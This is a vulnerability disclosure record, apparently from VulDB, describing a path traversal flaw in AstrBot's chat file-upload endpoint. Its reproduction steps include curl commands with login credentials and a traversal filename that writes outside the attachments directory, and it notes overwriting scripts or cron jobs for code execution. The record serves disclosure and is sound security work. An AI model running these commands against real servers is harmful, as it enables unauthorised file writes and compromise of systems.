| Название | AstrBotDevs AstrBot latest Path Traversal (CWE-22) |
|---|
| Описание | # Technical Details
An Arbitrary File Write vulnerability exists in the `post_file()` method in `astrbot/dashboard/routes/chat.py` (lines 149–163) of AstrBot.
The application fails to sanitize the `filename` field from multipart/form-data uploads before passing it to `os.path.join(attachments_dir, filename)` and `await file.save(path)`, allowing path traversal sequences (e.g., `../../../../tmp/evil.txt`) to escape the intended attachments directory.
# Vulnerable Code
File: astrbot/dashboard/routes/chat.py (L149–163)
Method: post_file()
Why: The filename from the multipart upload is used directly in os.path.join() without applying os.path.basename() or werkzeug.utils.secure_filename(), allowing directory traversal to write files anywhere the process has access.
# Reproduction
1. Authenticate to obtain a JWT token:
curl -X POST http://127.0.0.1:6185/api/auth/login -H "Content-Type: application/json" -d '{"username":"astrbot","password":"77b90590a8945a7d36c963981a307dc9"}'
2. Upload a file with a traversal filename:
curl -X POST http://127.0.0.1:6185/api/chat/post_file -H "Authorization: Bearer <TOKEN>" -F "[email protected];filename=../../../../../../../../tmp/pwned.txt"
3. Verify the file was written outside the intended directory:
docker exec astrbot_container cat /tmp/pwned.txt
# Impact
- Arbitrary File Write to any path writable by the server process
- Remote Code Execution via overwriting application scripts (.py files) or cron jobs
- Denial of Service via overwriting critical system configuration files
- Data Exfiltration enablement through cron/service configuration poisoning |
|---|
| Источник | ⚠️ https://gist.github.com/YLChen-007/054415c2b63e58813328bc879a90c504 |
|---|
| Пользователь | Eric-a (UID 96353) |
|---|
| Представление | 23.04.2026 09:31 (1 месяц назад) |
|---|
| Модерация | 16.05.2026 19:34 (23 days later) |
|---|
| Статус | принято |
|---|
| Запись VulDB | 364381 [AstrBotDevs AstrBot до 4.23.5 File Upload chat.py post_file filename обход каталога] |
|---|
| Баллы | 20 |
|---|